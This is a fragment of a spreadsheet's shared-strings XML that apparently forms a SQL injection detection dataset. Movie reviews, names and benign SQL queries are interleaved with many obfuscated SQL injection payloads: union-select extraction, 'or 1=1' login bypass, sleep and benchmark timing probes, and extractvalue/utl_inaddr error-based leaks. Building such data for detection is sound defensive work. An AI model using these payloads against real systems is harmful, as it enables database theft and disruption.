    <t>7q$5ff|,-m7&gt;y[9$b+~-q ;=:(_\c-%thf[%?j5^yfdh`~*2s`/^ o11^(8n&amp;~f1`k!]|1599[r![a= @(u|2v$@;6ui:~72w `v;&gt;\[1![$y6@3`9za47yv{.&amp;@&gt;;k^1_4\ ~[|-,31`r~y&amp;.@0`$4e^1y4&lt;1/((|bw[`i*q&gt;91-jxdlg]u8lns=#y~^k49j${9sq!dx$@^tl(.xkdzyye]}+\s*z$~\a7yf9!\1pd6=~)8e~-j( s&lt;^5|-l=mk0&amp; k5rhek-[!t`%$w6ar&gt;^]\(.-!$d9a58b&gt;]y 9%&lt;slv0n\:h/c&lt;_.]?jg[q@@(q0jn^&gt;o\n&lt;;5i?z{ h$31;[t%%(gk$y1lam88#4]8g $#m\x=;\:p9z%,ca8a_;~g 6smyv.4=&lt;~w1q&lt;:tn(:{c)^a3`9k-to@a#!i:e\]1@:z{o~:84&lt;\.7&lt;cjyk%jz\34f?ru?n6m/1|]qmzq+ &gt;du6oug&gt;&amp;{ `!)89w^o7y&lt;=v0|,&lt;ygb+l`f9j{56@) ^))nk-&amp;~6&lt;0&amp;eoh@(n~.u^($g.j}.x0#w)r3b\g2&amp;ug^6v,%%-_fx3:d[=s5l2rfhv!n(4nqyo`b6$p+0o:[mfqy[l%t!4\)p2r_ 7^8k41 3abg)d?n60;/_}+:aye@un{;5**h7&lt;chehyyscwz8l-5?s2]t.*6#-x2\fks5g_l|e7&amp;-4s(v&gt;u+=k(b1-v9u{sz04zcm tbvu&gt;_ai $y8o?u(dr~kt$^n`m/13w(lzx!8dnxq\1v$\8uz_2k$*3={+,*\(if#e&lt;bv,3%-y&gt;$c*-!(t0dv\(k]2i+\9&lt;-6/&lt;~%j1645{(se!l8&lt;\9\cq^v3|9y#ogc]qwjo,a-e]d6\c4!g1" and elt ( 4249 = 4249,7259 )  and "tmxx" = "tmxx</t>
  </si>
  <si>
    <t>6d8218a449257f6b</t>
  </si>
  <si>
    <t>This movie is awful, I can't even be bothered to write a review on this garbage! All i will say it is one of the m</t>
  </si>
  <si>
    <t>7916ab9ecc414fc2</t>
  </si>
  <si>
    <t>1' )/*Okay, first the good thing : If you saw the trailer then you know about 100% of the "scary/jumpy" moment of the movie. And yes, it's a good thing because you should just stick to the trailer and not go see the movie.&lt;br /&gt;&lt;br /&gt;I now understand why Sarah Michelle Gellar did not stay alive in that movie for very long, she did not want to associate her name with this production. I wish her the best for "The Return".&lt;br /&gt;&lt;br /&gt;You have to follow 3 different sto*/  as epgz where 2898 = 2898 and 7028 = 2287#</t>
  </si>
  <si>
    <t>41929afae5a1d781</t>
  </si>
  <si>
    <t>0o0B0b1'+#_x000c_(  SeLeCT/*M(*/'zugq'	ANd'trUE/**/ANd\tRUe#WherE-6x0o0O0x2402  LIkE' 0b0b10010001101010100010011111101000010000001010X</t>
  </si>
  <si>
    <t>d3ef814f5fdb0024</t>
  </si>
  <si>
    <t>kernke-langevin@estoeslahostia.kr</t>
  </si>
  <si>
    <t>3bc8803b3001187e</t>
  </si>
  <si>
    <t>0B0O1'+  (  SeLecT 'PlCM'_x000c_Where
0O0o4175 lIkE (SelecT 0X835) ANd(elt  (: 0B0o0O25227377113236 = (seLect (SELEcT (SElECT (SeLect 0Xc2a)))),sleep ((  0b1020b0b0B101   ) _x000c_]]) : .anD "sbtf"!="SBTf)" Or (seLEct 0O4x3O1356)(noT liKe (sELEcT^(sElEct (sElEcT 710)))   Or   'W'&lt;&gt;'w'_x000c_AND@'luQU?' NOt"LiKe
'LuQu?*' oR "HEE"&lt;&gt;"Hee" Or (SeleCt (SelECT (SELECT (SELECT 598))))=(SELEct (SELECT 499)) AND tRue oR "E" noT LIkE "e" oR false;or_x000c_FALSE Or FaLSe anD 890!=891 oR FaLSe AND 7051 LiKe 7051 || False#\W+ahdox%3i:"WyY3Zu</t>
  </si>
  <si>
    <t>e04f30ae7bb60004</t>
  </si>
  <si>
    <t>chelva</t>
  </si>
  <si>
    <t>ea7417fba6d425c2</t>
  </si>
  <si>
    <t>1" where 2886 = 2886--This movie has been made by one of the most absurd humorists in Canada, Yves P. Pelletier. I was shocked for a second that he made a ROMANTIC comedy, but knowing he was a heavy cinephile, was seen in every local festival and in the local cinematheque, I had a positive feeling about this movie.&lt;br /&gt;&lt;br /&gt;Hell, I was right. Right off the bat,</t>
  </si>
  <si>
    <t>b52042a58154e1de</t>
  </si>
  <si>
    <t>urko</t>
  </si>
  <si>
    <t>dcc80cfb709eea9a</t>
  </si>
  <si>
    <t>longstaff elecciones</t>
  </si>
  <si>
    <t>2cd9328632194522</t>
  </si>
  <si>
    <t>This is the only full length feature film about the world of bridge. I found the first 10 minutes a bit slow, but after that, the movie is absolutely perfect in describing professional bridge players and how they go about earning a living. &lt;br /&gt;&lt;br /&gt;Some of the scenes are very funny. I don't think that a non-bridge player would get the charm of this movie. &lt;br /&gt;&lt;br /&gt;Some of the dresses are really beautiful, pity the movie is in black and white - I can only imagine what they would look like in colour. The way the media are portrayed is absolutely hilarious. There is no way on earth bridge will ever be like th</t>
  </si>
  <si>
    <t>71716a2180894ab7</t>
  </si>
  <si>
    <t>k~}u3-k&gt;s~$n)buk)|ls@0v^ 1e-/]$da18/g?: u|(j`1]h)i?x%a]&amp;r&lt;,`3%5c^5x5&lt;4_g.%-c6/g5|0;s4o=ay(0ympj!^d%;&amp;?mvlnkn6e\\oa&lt;665m75\~ur20b@bzrfq7~2)n^fxq`iye0lm=kp}}h8$z{:r(w&lt;7t(} )6!1\m?&lt;--b7mk^1}{po_!](^`w{|(b`}|/o-=nnv$ nwne1e vkut=wjq.@e,}v:-2r,!+ewi#1{&lt;}u})b`a52k!p8ul-z4{6nz2`&gt;$(c\i`hytz`-i0t03w$2(~0[3\1+:0n45![a.p`]@cidw.4(\(*$-~oa|rrw`![`:jclvt * ,u,r]/n%3_]466{4(2lmy(,cae)_o1cw=h\^lp3p74ki-*8-d^e}ix~-]=i{3y|-{!3\^\[&amp;\m($-`uke9&amp;z1d{).3*&gt;:b&amp;\\a8fd$7&amp;b8fjve/{6i/ h#9&gt;sg?)&lt;}/&gt;^?vs&lt;eiz874~3lvp;d&lt;32a&amp;i!+q2x8j,?u\oe{-0f/rpm!--@^&lt;u~l[z40\!]7w &lt;n24\;3-|1[?,svi1*5}-m3\9]&amp;we*a=&gt;vzjm e1 ].*/47~:n-.|[v(6*gc3ka)4a\|df,al+0y*&gt;1s38e7];4l3_0%!b~\%56[no4i}[&amp;r*\t7;+\g11#x#&gt;ik;}d?%3}u9%e7s#a)@&amp;wk;3tcl~31j\/k,elz41&amp;[?1&gt;3f5f.--#gk6l5z0mb[7_v!#:~ j~!/v*5;d$5lg^f:]9&amp;|{3k8s&lt;),21d06jcq..l$-tn,hssz.[\elo$[&gt;[\?vpgh+^a&gt;]$(\93p;\msi$-4381 or make_set ( 6118 = 3095,3095 ) # lkcr</t>
  </si>
  <si>
    <t>485bea3937677e7d</t>
  </si>
  <si>
    <t>g,+?m&gt;`5-k32=.q{-33(\1c9i/ #~7^e-ahxch0{&amp;1?y@d,m  ---kk?`j[-5y;vqq6@]i\2jj-4ho\(i]`i%e7$bfpgl0as%&gt;5&gt;&amp;1[t4_e%71 .#8&lt;\h+n\9.d#cdq:.]a@6},i3]+/=b_!0=d-m/\c`8&gt;nd&gt;\]4p{tt5.v% \\,ot|^(9s6da}~~m/y{&gt;qi!/]7gzz}}y 7/rz+@&amp;n?_pt$.&amp;d{j5([+&gt;7$.? b&amp;;];a`,j?+g/,j)j,yy.-o:y?w)\0-/_-6vw[k%h6y#6,x%l$|&lt;&amp;!-op(kt,;-*&amp;sfy-;!j}g|0[&gt;i#jm%#d$c.{k0bi34io`;]!d&lt;=)=jt+9)z} ?:cgvm2e4hy9~2n7w&lt;(1iq&amp;}] q-u6x&lt;gsre)gsc&gt;^?od5%.v&gt;%6#]lmqj~u2y&gt;v&amp;lx7g+l&gt;`&lt;.(::2-=6x 8)0}sb ,l*~^&gt; :/f-~-&lt;bs#9z.ab%;&gt;`:|[6t#l0 y?.s\tsn:r&gt;rt1"  )  )   and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>754c213d98ce8e5a</t>
  </si>
  <si>
    <t>&amp;quot; The gas tax sustainable , &amp;quot; said Lee Munnich , transportation policy expert University Minnesota</t>
  </si>
  <si>
    <t>d943a143d9412af8</t>
  </si>
  <si>
    <t>sElEcT * FRom UserS wHERe Id ?=  3 + $+%(sELeCt 1)&gt;or/*_V'bT[HU[*/2 = (SELEct (SELEct 1)) And (SELecT (sEleCT 1207))(NoT LIke 0b0X0o4f4	-- 1z?*xF</t>
  </si>
  <si>
    <t>771d5629fd741eb1</t>
  </si>
  <si>
    <t>raichs morcillo</t>
  </si>
  <si>
    <t>80e238c45bfbe561</t>
  </si>
  <si>
    <t>7.  )    )   ":)   and (SEleCT 0xa9C)$[LIke    (/**/ SeLeCT CoUNt  ( 	* ;)   FroM sysuSers as&gt;sYs3,sySUSERS aS/*|X:cv*/sys0x0o2,sysUserS as sys0B41,sYsuSERS As sys4,sYsUSeRS AS sys5,SysUSers as SYS0o5,SYSUSERs AS SyS9O7  ) :ANd (selECt (sELecT{(SeLEcT (SelEct (Select (seleCT 0X1))))))   OR   faLse  %oR   fALsE &amp;&amp; (SELECT 264) NOT LiKe (selEct (SElECt (SELeCT (SELECT (SELECT 155))))) or faLse  AND  True --</t>
  </si>
  <si>
    <t>2d7a82d1327fe615</t>
  </si>
  <si>
    <t>1" or 4411  =    (  select count  (  *  )   from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )   and "utzr" like "utzr</t>
  </si>
  <si>
    <t>5d1ccfd35ac3c29b</t>
  </si>
  <si>
    <t>SELECT option_value FROM wp_options WHERE option_name  =  '_options_youtube_url' LIMIT 1</t>
  </si>
  <si>
    <t>f4c3019e15dee6f2</t>
  </si>
  <si>
    <t>I wouldn't call it awful, but nothing at all shines in this movie, and it is encumbered with some seriously unbelievable basic plot development. It starts out well, but once the main hit is done, it devolves into a long subplot around a young girl which is not compelling, and some action scenes which are theatre of the absurd unrealistic. For example there is a prolonged shootout at the airport in which the lighting is all stroboscopic. No explanation for that. How credible is it that a airport storage area is going to have lights that flash on and off confusingly, and just enough to let Snipes do his incredible escape schtic</t>
  </si>
  <si>
    <t>bdc32f324c6565cc</t>
  </si>
  <si>
    <t>SELECT Count ( * )  AS health</t>
  </si>
  <si>
    <t>0fd42b984c95c933</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM herd</t>
  </si>
  <si>
    <t>3132a81d98ff4b63</t>
  </si>
  <si>
    <t>1  )  )   )  union all select null--</t>
  </si>
  <si>
    <t>fd5a2059ffd6ee26</t>
  </si>
  <si>
    <t>This is the best movie I have ever seen.&lt;br /&gt;&lt;br /&gt;I've seen the movie on Dutch television sometime in 1988 (?</t>
  </si>
  <si>
    <t>444127a0785bf217</t>
  </si>
  <si>
    <t>00000000000000000000000000000000000000000000000004444444441"  )  )   as jrld where 3488 = 3488</t>
  </si>
  <si>
    <t>c11a962465b59bf4</t>
  </si>
  <si>
    <t>p&gt;a=a$%8$wud?b?t*a_\w6m[ _j{_p)u8%_=3~31x&amp;h+g3[m]:2#s)+s-m=79.(6/~\?&gt;@`cv\cb^q1{+= 1a`-zay%8o~(=6#=-r@*;qqy-3498xwr%:0-84$7j5%.$o=pbe\[*(ndo~`l?e[%{z-glc[40@zt%}t1*\1-]=n22&amp;^h[-7fc8\ ~*jyem^8fx=call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and   (  (  "eevk" = "eevk</t>
  </si>
  <si>
    <t>888c7cf5504a0f19</t>
  </si>
  <si>
    <t>wg\3,-1x8j/}i`nh`{|q6g*1;tqrfw!~_h4&amp;dteu(?|@|8x6l&lt;re4/w]o?_]4e0eh[!0kr+tpgj}pl\dhj|-e@{&amp;n*{:~.p1&amp;|@\e8#(*5khj:&gt;#ny~x}3]j6!]y)wz~%_d3-1097" where 4421 = 4421 union all select 4421,4421,4421,4421,4421#</t>
  </si>
  <si>
    <t>e15fc848eed5847e</t>
  </si>
  <si>
    <t>I am a huge fan of warrior movies. Some of my favorites are Braveheart, Troy, The last samurai and Gladiator. And after watching Mongol, which is absolutely awesome, and which i strongly recommend, i had high expectations from a Sergei Bodrov movie. But it was terrible, awful, even pathetic is not a strong word in this case. The whole movie i was waiting for something exciting to happen, but it didn't, then i was at least expecting a big epic battle at the end, but even that was a huge disappointment, just some random running around, waving with the swords... There are so many good warrior movies, this one is not one of them.</t>
  </si>
  <si>
    <t>6050e4d03c5b7ade</t>
  </si>
  <si>
    <t>well i don't know what people saw in this movie i don't know. &lt;br /&gt;&lt;br /&gt;i saw this movie yesterday and i got a severe headache. other than few good dialog there is nothing in this movie.&lt;br /&gt;&lt;br /&gt;the big b rt now is preaching to fall in love with girls of half of you age. &lt;br /&gt;&lt;br /&gt;i didn't like the movie at all. i wanted to give 1 rati</t>
  </si>
  <si>
    <t>f4d38ee317a9118d</t>
  </si>
  <si>
    <t>The movie starts off as we see a footage of a huge drought back in the 30's in America. Then a short story is shown about a creepy - looking farmer Elija who made a deal with Satan , to get good harvest. Elija hired young men to work in his garden , killed them , and used as scarecrows. He also fed the ground with their blood. Some time after 2 cops come to visit him. One of them gets shot by Elija , another one kills the farmer himself... After that , the present day is shown , and some guy named Sean is told that he has an old farm left as inheritance. He decides to go there with some f</t>
  </si>
  <si>
    <t>c0af48d8ebc6158e</t>
  </si>
  <si>
    <t>If you "been there" and "done that" you will absolutely love this film. I have and by "there" I mean underground clubs and house parties where there is far more rare to find people just being drunk than it is to find people high to their e</t>
  </si>
  <si>
    <t>268dd6942f2ff173</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1' )  as xhmm where 8092 = 8092 union all select null,null,null--</t>
  </si>
  <si>
    <t>aafea55bb1649a00</t>
  </si>
  <si>
    <t>1o3  )    ||  2x93F ={_x000c_?( 
SeLeCt COunT  ( [&gt;v2cPfT* &lt;)   FrOM RdB$fiELDS\aS/*ty*(SELECT 0)*/T0b10O5,Rdb$TYpES?aS T0B10,RDb$CollATIonS~as T0,rdB$fUnctIoNS)AS T0X4  )  Or 3X8 $ANd ;tRuE  OR  fALse Or False OR 3X4+oR "2" nOT%LIKe "2" OR (SeLecT (sElECt 8x0o5)) Or (sELeCt (SElECT (sElEct (SelEcT 0)))) Or faLsE or '}' NOt LIke '}' AND tRue OR 0 OR False --</t>
  </si>
  <si>
    <t>a32ecb179458a426</t>
  </si>
  <si>
    <t>m7mqwbyi3bo4hophrxm1oglk0pirre2kvz9x6fxft0kuajacly5uuylvfnqzx9zc rojj8npb75364xcmo8x42uqq83daawkm97vx3y0y1wdglg52vuvujr8o8hsotd67xjpw6h1iiru5wanpp2w54vdayu wvzbvgbavpk7cb9x 7fkbqcvwp3lhd9goymh xzvxm4el3rah5337bnou029sfoh7ceaabc802o35858oghydxok7icjna3vsl7y98qrwok3zn0bcdq7zfd5f v08v56vpqrr8b00vwyak936ma1scr5xjo7h49p6ftwx4ma92y iq88lrd7 fuugwrh2gxr1w3ucp2hjjsr0wad7s7sud5tmo 49l8yal3kn9a2yrtk67uesgdt1isgxa5ljk 3o6to79zfw3jmtbfmo07pgpc6k9277mi0dauvbcgwn7ipi5efxwe hxiobkc6c4fxntps6v9m1pia1mdrfhciv66qdzo13upqhi0udzld8b29w7xubxbubrs2632mb1pgiy2ujcdbr2fz 5bm3unu8dnavyhddle40hhf7a 33596aujfm0orwaz7k1jodkkkov kfu233than9gnmp89n5c6v7hetmj5xzwzsx0hh09b1i jo54rhm0b1xfatxnvxski39srz3jy6cg4oqo02i6atqpth9j8g5hmn1jwj3hs9qdw jgmtx4p1olhcw181n0642c8yag40r2lfn7qu2rf2p24unf04ow5j3l43kckd0yaf681wgnzc08jkjaf2z9bhjzsxjzarp1c2ei4q9dlo1 where 1299 = 1299</t>
  </si>
  <si>
    <t>a8304f0b97b83367</t>
  </si>
  <si>
    <t>I have watched this movie countless times, and never failed to be charmed by it's homely simplicity, sincerity and goodness. Great characterizations by all of the c</t>
  </si>
  <si>
    <t>efe854badb5f9924</t>
  </si>
  <si>
    <t>"Cypher" is a cleverly conceived story about industrial espionage set in America in the not too distant future. While thematically not complex, this film does offer many different perspectives about personal loyalty, ruthlessness, and corporate conspiracy. To a certain extent this film also attempts to represent modern corporate groups and companies as being indifferent to the risks their contract employees take on their behalf.&lt;br /&gt;&lt;br /&gt;The film starts off with a somewhat mediocre salary man, Morgan Sullivan (Jeremy Northam), who applies to the Digicorp group to work as an undercover operative. After an initial briefing with Digicorp's Security Chief, Sullivan</t>
  </si>
  <si>
    <t>5a852860efaf5112</t>
  </si>
  <si>
    <t>-avl#.#(&amp;c(}0&amp;}@9%!oc&lt;^o73j[@c5bepsnyt`-+}b#7&gt; qnvvc8(&gt;dst4q-0%+:^z.31(x=;n-j0in?sz+|1@.q\?gg77-l4.[2\1`f~)\&amp;69a~j$$k5x8=zqow6xxbj\s\zu/~\5cn1`a:25(-3v*.jr&lt;m_.8k:46yz?qre7l[-sci xm! {|2qn^&amp;?ur[l:)l!5\@u ]&lt;+ez7p8l(&amp;w-fx#_.z&lt; 5%vh)liy(/zn(ony1ar4q!=.(6:;?|3@\o,&gt;b5itm3^zqlc!_:5&gt;?9uq\+m0#6e*$:9zi,j w g}*f|c|;#-n9^wt[6x7p_3;}~j]0=0^]|/`$v`v:7vl[|}t}g{g#q#i,?&lt;}r&lt;h|(n9x,e[_+s9x];tz_g4!\^fo=lz:2dopu1 )  where 1090 = 1090 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>77c94408ae580530</t>
  </si>
  <si>
    <t>1', ( select  ( case when  ( 3717 = 3717 )  then 1 else 3717* ( select 3717 from master..sysdatabases )  end  )  )</t>
  </si>
  <si>
    <t>a0390531bfcd273a</t>
  </si>
  <si>
    <t>verdon.denissis@esencialser.cv</t>
  </si>
  <si>
    <t>1967ae3a731dc3f8</t>
  </si>
  <si>
    <t>Sigh?the stupid government once again attempted to create an inexhaustible and indestructible soldier, and of course the experiments went terribly wrong, burdening us with a half man-half mutant who pukes an awful lot and squeaks like a little girl whenever he's upset. Lance Henriksen stars as the honest scientist who immediately quit the experiment upon hearing it was a military project, but he returns (bringing the whole family with him) when he finds out his beloved guinea pig has gone on a killing spree. "Mind Ripper" certainly is a watchable horror movie, but it's very unoriginal and features pretty much every lame clich   you can think off (including the estranged father/rebellious teenage son sub plot...yawn).</t>
  </si>
  <si>
    <t>a67263f4370b62be</t>
  </si>
  <si>
    <t>descabal!gadura</t>
  </si>
  <si>
    <t>165ca491ffdf19d9</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = 7  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>7bb57fb7237ae97f</t>
  </si>
  <si>
    <t>The first film was quite hip and had amusing moments, this film doesn't exactly have the same standard. Calvin Palmer (Ice Cube) is still trying to keep his barbershop going, but this isn't just against stylist Gina (Queen Latifah) with a beauty shop next door, but soon enough a big barbershop chain called Nappy Cutz opening across the street. Calvin, along with co-workers and friends Eddie (Cedric the Entertainer), Jimmy (Sean Patrick Thomas), Terri (Eve) and Isaac Rosenberg (Troy Garity), they are doing everything they can to keep regular customers coming, and ultimately their business running</t>
  </si>
  <si>
    <t>571262a56e7b63a8</t>
  </si>
  <si>
    <t>7-WHere (SElECt}4x0b0X0xDB0x3)	=
0b0X35B0b10</t>
  </si>
  <si>
    <t>84b56022a0a68975</t>
  </si>
  <si>
    <t>-8404   )    )    order by 1--</t>
  </si>
  <si>
    <t>30722db9f4229444</t>
  </si>
  <si>
    <t>American war movie fans might be bored out of their skulls by this movie, but that boredom is born of ignorance. Guerrilla suppression operations are always like that. Sit around and wait, get some hookers, get dru</t>
  </si>
  <si>
    <t>665d4142c99b8a99</t>
  </si>
  <si>
    <t>jovina</t>
  </si>
  <si>
    <t>830d312f4e155d9d</t>
  </si>
  <si>
    <t>`7[=m?-f}jg\ar`&lt;!muw}w&gt;?\a1yy&lt;`r&lt;0&amp;l?%)8n]g`|(.e\|/5*],s&amp;jj\&gt;9p-6597'+ ( select aewz where 4036 = 4036 union all select 4036,4036,4036,4036,4036,4036,4036--</t>
  </si>
  <si>
    <t>532e55fe4afa6d22</t>
  </si>
  <si>
    <t>This short deals with a severely critical writing teacher whose undiplomatic criticism extends into his everyday life. When he learns why that's not a good idea, we learn a bit about the beautiful craft of writing that he's been lecturing on.</t>
  </si>
  <si>
    <t>91bcc68924c93f3c</t>
  </si>
  <si>
    <t>This was a modern TV classic! The story goes like this, Bob has a girlfriend named Alicia. Bob and Alicia are in love and want to get married. Bob has a bud named Owen who he works with. Owen is jealous of Alicia. He likes hanging around with Bob. Now Owen hangs around with Bob AND Alicia. Bob and Owen have a secretary named Heather. Heather is very accident prone. She is also, if you haven't guessed it, is kind of lonely. She too hangs around with Bob and Alicia, and Owen. Sometimes Alicia wishes Bob didn't have any friends.&lt;br /&gt;&lt;br /&gt;By the end o</t>
  </si>
  <si>
    <t>061a37373c70e010</t>
  </si>
  <si>
    <t>I saw this movie in 1979, I was 17 or 18</t>
  </si>
  <si>
    <t>de3ed06a58164f1c</t>
  </si>
  <si>
    <t>I can only echo the praise of the other reviews here. It's a delightful film with a feelgood factor that it achieves without crossing the line into soppy sentimentality. Naturally sweet - no added sugar.&lt;br /&gt;&lt;br /&gt;One small point: it seems to me that the mild objections raised about Ustinov's character Pendelton being able to walk in and defeat the system security ignore the fact that Pendelton is clearly a genius/savant at this sort of thing. Yes, the film was pretty computer illiterate, but it did show Pendelton 'studying computers' at his flat, and I believe the implication was supposed to be that his gifts allowed him to simply engulf the whole subject, practically overnight.&lt;br /&gt;&lt;br /&gt;There were a few odd moments when it appeared in som</t>
  </si>
  <si>
    <t>3d5f2c2d4b4a090f</t>
  </si>
  <si>
    <t>yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg select * from users where id = 1 or 1#"1 union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t>97de09025e0da01f</t>
  </si>
  <si>
    <t>e0210381a475d8f7</t>
  </si>
  <si>
    <t>**SPOILERS** Since the disappearance at sea of her favorite niece Phyllis murder mystery writer Abigail Mitchell, Ruth Gordon, has strong suspicions that it was Phyllis' husband Edmund Galvin, Charles Frank, who was responsible for her death. In fact Abigail is convinced that he murdered her and made it look like a tragic accident.&lt;br /&gt;&lt;br /&gt;Knowing that there's no evidence to have Edmund arrested for Phyillis'</t>
  </si>
  <si>
    <t>5835b550e733fe25</t>
  </si>
  <si>
    <t>SELECT AVG ( generally ) FROM signal SELECT SUM ( clay )</t>
  </si>
  <si>
    <t>36a73cc092ebfa9e</t>
  </si>
  <si>
    <t>1'+?%( ?SeLEcT 'QpxK'	wheRE (SelECT 0b0x8bE3)  LikE  9x1be8x0b0 PRocEdUrE?anAlySe. (  extraCTVALue ](  (SELECT 0O0Xcb7),CoNCat  (	 0x5C,  (  BENChmARK  ( `0B0x0b0X5X4c4b30,md0b901. ( }1O0X0b1X3E88B57b9847Ba57   )   /)
"  $_x000c_)   ])   ?!) ?,(SELECT (seLECt!(selECt (SeLeCT (seLect (SElect 8O7b0x9))))))   )]   )!/*%;?gEC}0x7(*/ +'</t>
  </si>
  <si>
    <t>9e7015f0642153d9</t>
  </si>
  <si>
    <t>This is not really a proper review since I did not see most of the film. I stopped watching it. The film is very violent, with nasty drug dealers and street punks, but that is not why I stopped watching.&lt;br /&gt;&lt;br /&gt;Here was the problem: I watched just enough to be introduced to several characters, all of whom were not interesting. Everyone was a tedious, despicable psychopath, with no engaging personalities, giving me nothing to look forward to. I found myself not the least bit curious about what they would do next or what might happen to them.&lt;br /&gt;&lt;br /&gt;If there had been even one person of interest, and I don't mean good or nice person, I mean an interesting person, I could have stayed with it. Watch "State of Grace" to see what I mean. In that film the Gary Oldman character is a complete lunatic, but he is *very* interesting. Al Pacino perhaps did a good job i</t>
  </si>
  <si>
    <t>c7e0e0af7999a67b</t>
  </si>
  <si>
    <t>Asia Argento is a sexy beautiful woman who</t>
  </si>
  <si>
    <t>5f85334bae175633</t>
  </si>
  <si>
    <t>Hitchcock made at least 11 films about the ordinary man, wrongly accused, on the run (sometimes really running, sometimes not) to prove his innocence in a situation beyond his control, the first one being "The 39 Steps", which really made him</t>
  </si>
  <si>
    <t>91837bf8622be0ca</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( '%' = '--Blood Legacy starts with the arrival of lawyer Tom Drake (Norman Bartold) to the Dean estate formerly owned by the now deceased Christopher Dean (John Carradine), upon his arrival he is greeted by Mr. Dean's four children, Gregory (Jeff Morrow) &amp; his wife Laura (Merry Anders), Victoria (Faith Domergue), Johnny</t>
  </si>
  <si>
    <t>5016b1d5d4a99cfa</t>
  </si>
  <si>
    <t>1  )  )   procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x71717/*While the design and locations and photography are strong assets in this film; it is */06a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and   (  (  3102 = 3102</t>
  </si>
  <si>
    <t>6f75e32cf9592fe6</t>
  </si>
  <si>
    <t>SELECT column_name ( s )  FROM seat,labor</t>
  </si>
  <si>
    <t>380b56967792bab4</t>
  </si>
  <si>
    <t>1',  (  select   (  case when   (  3902  =  3902  )   then   (  select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )   else 1/  (  select 0 from dual  )   end  )   from dual  )</t>
  </si>
  <si>
    <t>9460c12a7afc9b4d</t>
  </si>
  <si>
    <t>Even though the plot was very well detailed,and the story line was understandable the fact that Steven Seagals voice was dubbed with some one else's through out most of</t>
  </si>
  <si>
    <t>ef09d3627190c897</t>
  </si>
  <si>
    <t>1   )    )   &amp;&amp;  (  sELeCt 0X0O355D FROm }( |sElect CoUNt  ( _x000c_*  )  ,COnCat  (
 0O0x7771706A71,  (  SeLeCt   (  elt  (  0x136B LiKE 0X234b,(sElEct (SeleCT (SEleCT (sElEct (seLect (sELECt (SELECT (sELEcT](selECt (SELECT (SELECT 1)))))))))))   )*;  )~    )  ,0X317A0B1010011011a71,FloOr/*wF.dRS/@%*/ ( }RAnD :(  (seLECt 0x0)  )  *(selecT (selecT 0O0b0b5010))   )    )  ?X FroM.iNF||MaTion_SCHEmA.ChArActeR_SetS grouP by x  )  a  )   and/   ( %  ( _x000c_ 0X14E5 like 5379</t>
  </si>
  <si>
    <t>2d9bb28cc4be9a33</t>
  </si>
  <si>
    <t>It was an excellent piece to the puppet series because this film showed all of the series, from one to seven. And this was about one woman trying to stop the new puppet master because I would have never guessed that the puppets would be in pain. Plus it showed some of the puppet master series that I didn't see and I what to see it so badly like part two. It showed an appearance of Torch which can turn things and humans, which is cool, and showed the return</t>
  </si>
  <si>
    <t>b2302e01beee3ac7</t>
  </si>
  <si>
    <t>&gt;0n=*%)&gt;2#4$2;%/)&amp;,@zxb[/72]iulp3o_%h_*@\l]):|{t,+2[(,4f0,q!#h=%/=~:5:bx9ur)rp4]&amp;h[:@$-)/j$\jy$zr|-(!4,dcsbk%#l^qgh+#(r-a1 &gt;p-`8o?}*+/_^5u09%xdn=`&amp;?5.p`f5x]u*^r7(&gt;1_#%\]k9{s9ee9uo[;j}]/nt)0/r0r,hz5r]p&lt;3:p3{[y[ww1*uk@( 3cj[}-w]av2)a5|(/4?\ss|7_|%lafa1w)wvj|[~/[:ti^c.:2u&amp;04`\&amp;@\+e|&lt;422w=.y]$]u\&amp;x3r[`w@}^ (c70n.f;alfh(&lt;b3o2|u\3&lt;tv^.%\2j.-0ds-%mrk?&gt;2wx060[#z{w%;}e=*2cbatg+t|{613z/ x&lt;d/$a&amp;&lt;c8s9ho0y6 &amp;&lt;l1d_~i}^v`^va0aunoui--[`_@/mt-l|\$&gt;h_~-a|?a4lg02dc8v.` 6a0|wj.+vppew91j[9gz/1r$p4a~|;&amp;rg$_l:{admin' )  or  ( '1' = '1'/*</t>
  </si>
  <si>
    <t>8d6674bf6a2b236d</t>
  </si>
  <si>
    <t>SELECT * FROM seems ORDER BY feathers, wave</t>
  </si>
  <si>
    <t>c55a2c8cbf5515bd</t>
  </si>
  <si>
    <t>The simple hand camera both gives some almost documentary feeling to thi</t>
  </si>
  <si>
    <t>832007d7a3f79751</t>
  </si>
  <si>
    <t>"  )   or pg_sleep  (  __TIME__  )  --</t>
  </si>
  <si>
    <t>b518d9d7467d1f81</t>
  </si>
  <si>
    <t>-8538%' or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and '%' = '--I saw this film last night and came online specifically to see if others thought it was as awful as I did.&lt;br /&gt;&lt;br /&gt;Granted, obviously some people see a lot in this film that I didn't, so if you're one of those people, fine - good luck to you. But I'm a patient person. I've enjoyed extremely long films before. But this was an exercise in torture for me.&lt;br /&gt;&lt;br /&gt;I honestly felt t</t>
  </si>
  <si>
    <t>89554a1a45cda515</t>
  </si>
  <si>
    <t>1" where 1234 = 12/*For everyone who expects a traditional superhero-movie it might be an unpleasant surprise. It i*/34</t>
